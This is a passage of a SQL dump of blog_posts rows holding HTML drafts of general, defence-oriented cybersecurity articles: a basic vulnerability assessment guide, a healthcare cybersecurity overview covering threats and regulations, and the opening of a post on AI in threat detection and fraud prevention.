[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Review the detailed output and cross-reference CVEs.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools are invaluable for discovering potential weaknesses in your 
network or application environment.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Conducting a Vulnerability Assessment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to perform a basic assessment from start to finish:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Define the Scope</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identify the systems, networks, or applications you want to scan. Make sure you have proper permission to scan the target environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Choose Your Tool</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Install and configure a vulnerability scanner like Nessus or OpenVAS based on the complexity of your system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Run the Scan</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set up your scanner, inputting the target assets (e.g., IP ranges or URLs). Start the scan to identify vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Analyze the Results</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Review the scan report and take note of vulnerabilities with high and critical CVSS scores. 
Identify the associated CVEs for each, and validate findings before acting on them: scanners that match on banners or version strings do produce false positives.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Take Action</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Develop a plan to address the vulnerabilities. Patch outdated software, harden misconfigured systems, or implement workarounds where no direct fix is available.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Validate the Fixes</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After addressing vulnerabilities, rerun the same scan to confirm that issues have been resolved, and keep the before-and-after reports as evidence of remediation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Vulnerability Management</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Prioritize with CVSS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Focus first on vulnerabilities with critical and high CVSS scores, but weigh the score against context: an internet-facing host, a flaw with a public exploit, or an entry in CISA\'s Known Exploited Vulnerabilities catalog should move an item up the list even if its base score is lower.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Integrate with Patch Management</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Coordinate your vulnerability assessments with your patch management processes to ensure timely remediation of weaknesses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Regular Scanning</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Threat landscapes evolve quickly. Schedule regular vulnerability scans to stay ahead.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Monitor and Stay Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Register for security update newsletters, like NVD (National Vulnerability Database), to track new CVEs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Staying Updated on the Latest Vulnerabilities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a constantly evolving field, and staying informed about emerging threats is critical. Here\'s how to stay up to date.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Subscribe to Vulnerability Databases</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">National Vulnerability Database (NVD)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mitre CVE Database</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Use RSS Feeds and Alerts</strong></b>:</li>\r\n 	<li class=\"text-body 
font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Set up alerts for new CVEs or significant updates affecting your technology stack.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Follow Industry Blogs and News</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Cybersecurity blogs, newsletters, and forums provide valuable commentary about emerging threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\"><b><strong class=\"font-bold\">Use Social Media Communities</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\">Joining LinkedIn and Twitter groups for cybersecurity helps you learn from your peers.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Performing a vulnerability assessment is the foundation of a strong cybersecurity strategy. With tools like Nessus and OpenVAS, and a clear understanding of CVE and CVSS ratings, addressing critical vulnerabilities becomes much more manageable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the first step and start implementing vulnerability assessments today. Remember, staying informed and proactive is your best line of defense against cyber threats. 
Stay protected, stay prepared!</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 21:53:27', '2026-01-12 21:41:44', 'Information Security', 'How to Perform a Basic Vulnerability Assessment', '', NULL),
(56, 'Cybersecurity in the Healthcare Industry', 'cybersecurity-in-the-healthcare-industry', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Cybersecurity Matters in Healthcare</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The healthcare industry handles some of the most sensitive and personal data—patients\' medical histories, insurance details, prescription records, and more. This information is not only critical for providing care but also extremely valuable to cybercriminals. A single breach can expose thousands of records, leading to financial loss, erosion of patient trust, and potential harm to individuals.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the growing dependence on digital tools, electronic health records (EHRs), and interconnected devices, the healthcare sector has become a prime target for cyberattacks. 
This makes cybersecurity more than just an IT issue—it’s a vital concern for regulatory authorities, healthcare providers, and policymakers alike.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Major Cybersecurity Threats in Healthcare</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The healthcare industry faces a variety of cybersecurity threats, including but not limited to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Ransomware Attacks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These attacks lock healthcare organizations out of their systems until a ransom is paid, crippling the ability to deliver timely care.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaches expose sensitive patient information, which can be sold on the dark web or used for identity theft.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Insider Threats</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 
dir=\"ltr\">Employees, whether through negligence or malicious intent, can compromise data security.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Attacks on IoT Medical Devices</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet of Things (IoT) devices, such as pacemakers and insulin pumps, can be manipulated if not properly secured, posing risks to patient safety.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Scams</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emails designed to trick employees into revealing credentials can provide attackers access to critical systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Secure Healthcare Information</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To protect sensitive healthcare data, organizations must adopt robust cybersecurity measures. 
Here are some best practices:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Encryption</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encrypting health information ensures that even if data is intercepted, it remains unreadable to unauthorized users.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Access Controls</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing stricter access controls (such as multi-factor authentication) ensures that only authorized personnel can access sensitive data.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Security Training</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Educating staff about cybersecurity threats, such as phishing, helps reduce human error—a significant vulnerability in data security.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Routine Vulnerability 
Assessments</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conducting frequent security audits and penetration testing can identify and address weaknesses before attackers exploit them.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Backup and Recovery Plans</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly backing up data and having disaster recovery plans in place minimizes downtime in the event of an attack.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding the Regulatory Landscape</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Healthcare organizations must not only secure their systems but also comply with laws and regulations governing data security. 
Key regulations include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">HIPAA (Health Insurance Portability and Accountability Act)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enforced in the United States, HIPAA mandates strict standards for protecting healthcare data, including privacy rules, breach notification requirements, and risk assessments.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">GDPR (General Data Protection Regulation)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Applicable to the European Union, GDPR requires organizations to safeguard personal data and grants individuals significant rights over their information. Healthcare organizations handling EU patient data must comply, even if located outside the EU.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">NIST Cybersecurity Framework (National Institute of Standards and Technology)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While not healthcare-specific, this U.S. 
framework provides a robust guide for managing cybersecurity risks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">ISO/IEC 27001</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A global standard, this certification can help healthcare providers demonstrate leadership in securing information systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and adhering to these regulations ensures healthcare organizations avoid penalties while maintaining patient trust.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Key Stakeholders</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Compliance Officers</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Compliance officers are responsible for ensuring that healthcare organizations meet legal and regulatory requirements. 
Their role includes conducting audits, implementing policies, and addressing non-compliance issues proactively.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">IT Security Experts</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT security experts develop and implement technical safeguards to protect healthcare data. They also monitor networks for unusual activity and respond to breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Healthcare Professionals</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While not cybersecurity specialists, healthcare providers must adhere to best practices, such as using strong passwords, reporting suspicious activity, and participating in training sessions.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Policy Makers and Regulatory Authorities</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Policy makers play a crucial role in drafting and updating cybersecurity regulations. 
Their decisions directly impact how healthcare organizations approach data protection.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Studies in Cybersecurity Success</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Case Study 1</strong></b>: A U.S. hospital implementing real-time monitoring tools detected unusual activity in its network, preventing a potential ransomware attack. By acting swiftly, they saved patient records and avoided service interruptions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Case Study 2</strong></b>: A healthcare organization in the EU, facing repeated phishing attacks, introduced mandatory two-factor authentication. Within three months, incidents dropped by 60%, demonstrating the effectiveness of proactive measures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Case Study 3</strong></b>: A global healthcare provider adopted the NIST Cybersecurity Framework and trained all employees annually. 
Their robust approach reduced vulnerabilities and earned them ISO/IEC 27001 certification.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Don\'t Forget</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity in healthcare is not optional—it is a necessity. The stakes are incredibly high, and every stakeholder has a role to play. Healthcare professionals and IT security experts must work hand in hand to implement best practices, while policymakers and compliance officers need to ensure regulations evolve to keep pace with emerging threats.</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 21:14:02', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity in the Healthcare Industry', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(57, 'How Can AI Transform Cybersecurity? Use Cases and Insights', 'how-can-ai-transform-cybersecurity-use-cases-and-insights', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rise of digitalization has brought an increasing number of sophisticated cyber threats. For IT professionals, cybersecurity learners, and enthusiasts, staying ahead of these threats is no longer optional—it’s essential. Artificial intelligence (AI), with its ability to learn and adapt, is now at the forefront of modern cybersecurity strategies, offering powerful tools and insights to protect systems and data. This article will explore how AI integrates into cybersecurity, its use cases, benefits, challenges, and what the future holds for this innovative field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to AI in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence utilizes machine learning models, algorithms, and data analytics to perform tasks that traditionally required human intelligence. When it comes to cybersecurity, AI is employed to identify, analyze, and respond to threats faster and more effectively than traditional methods. From processing large volumes of data to detecting subtle signs of intrusion, AI has become a game-changer in the fight against cybercrime.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Importance of AI in Detecting and Preventing Cyber Threats</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Traditional security methods often rely on predefined rules that cybercriminals are increasingly finding ways around. 
AI, on the other hand, excels in detecting anomalies by analyzing patterns in user behavior, network traffic, and system logs.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance, instead of simply blocking malware based on known signatures, AI can identify and neutralize new, never-before-seen attacks (zero-day threats). This proactive approach allows organizations to stay ahead of malicious actors, ensuring better protection for sensitive systems and data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Use Cases of AI in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI applications are already making waves in numerous cybersecurity practices. Here are some practical use cases for better understanding its potential:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Threat Detection and Response</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI-powered solutions like SIEM (Security Information and Event Management) can monitor and analyze vast amounts of log data in real-time. They identify unusual activities that might signal a breach and trigger automated responses to prevent escalation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Fraud Prevention</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Financial institutions use AI to detect unusual transaction patterns that might indicate fraud. 
